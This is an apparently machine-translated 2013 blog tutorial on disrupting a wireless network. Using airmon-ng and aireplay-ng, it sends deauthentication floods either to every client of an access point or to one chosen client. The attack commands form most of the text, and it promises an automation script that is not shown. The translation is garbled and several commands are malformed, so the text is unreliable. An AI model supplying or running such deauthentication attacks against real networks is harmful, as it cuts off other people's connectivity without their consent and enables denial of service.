Saturday, September 14, 2013


In this tutorial I come to bring as knocking over a wireless network by performing a DDoS good for this nececitaremos acer wireless cardthat will help us to audit wireless acer as we used to crack WEP networks, nececitaremos also have the aireplay and especially good use Linux jejejej because here I leave the explanation to be guided on how a DDoS acer manually to a network connection and below I leave a to make this attack but his explanation automated greetings await your response

1-We put the network card in monitor mode with the command: airmon-ng start wlan0

2-We look at the access point channel and put the channel in monitor mode with the command: airmon-ng mon0-c 5 5 is the channel number and mon0 is the interface.

3-If we knock down entire wireless network deauthentication packets sent by an access point with this command tumbamos the whole wireless network without internet allowing all users connected to it aireplay-ng -0 0-a 00:11:22: 33:44:55 00:11:22:33:44:55 mon0 which would have to be the mac address of the access point and wireless network interface mon0.

4-If you just want to knock down a client connected to the Wifi network deauthentication packets sent to a specific client with this command GROUNDED tumbamos the internet wireless customer leaving aireplay-ng -0 0-a 00:11:22:33:44 : 55-c 55:44:33:22:11:00 00:11:22:33:44:55 mon0 which would have to be the mac address of the access point and wireless network 55:44:33:22 11:00 would be the mac address of the client and interface mon0.

* Here I leave the script to all this automated attack agan ...



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